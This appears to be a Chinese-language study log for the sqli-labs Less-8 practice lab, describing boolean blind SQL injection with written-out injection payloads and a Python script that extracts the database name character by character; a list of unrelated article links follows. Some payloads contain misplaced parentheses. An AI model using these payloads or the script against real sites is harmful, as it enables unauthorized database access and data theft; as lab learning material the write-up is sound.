sqli-labs学习记录8

less-8

打开靶场。

输入id=1得到了和前面一样的回显。

通过尝试前面的闭合方式,是'))的闭合方式。

我们输入id=1')).

发现没有报错回显。

这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。

我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。

比如我们可以用length函数和二分法来确定数据库的长度。

?id=1' and (select length(database())>1) and 1=1 --+

正常回显。

我们尝试输入

?id=1' and (select length(database()>8)) and 1=1 --+

显示无回显,下面我们输入

?id=1' and (select length(database()>7)) and 1=1 --+

回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。

那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。

python 复制代码
import requests

url = "..."


def inject_database(url):
    name = ''

    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。

查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。

相关推荐
neo_Ggx238 分钟前
MySQL数据库备份攻略:从Docker到本地部署
数据库·mysql·docker
麦兜*9 分钟前
MongoDB 性能调优:十大实战经验总结 详细介绍
数据库·spring boot·mongodb·spring cloud·缓存·硬件架构
盒马coding37 分钟前
PostgreSQL与Greenplum数据库的编程语言连接
数据库·postgresql
snowfoootball41 分钟前
近期算法学习记录
学习·算法
今天也好累43 分钟前
C++ 小游戏:拍桌子
c++·笔记·学习·算法
叫我阿柒啊1 小时前
从Java全栈到Vue3实战:一次真实面试中的技术探索
java·数据库·spring boot·微服务·typescript·vue3·restful
代码的余温1 小时前
SQL Server全链路安全防护
数据库·安全·sqlserver
武子康1 小时前
Java-118 深入浅出 MySQL ShardingSphere 分片剖析:SQL 支持范围、限制与优化实践
java·大数据·数据库·分布式·sql·mysql·性能优化
滴滴滴嘟嘟嘟.1 小时前
Qt图表功能学习
开发语言·qt·学习
charlie1145141911 小时前
Android开发——初步了解AndroidManifest.xml
android·xml·开发语言·学习·安卓·安全架构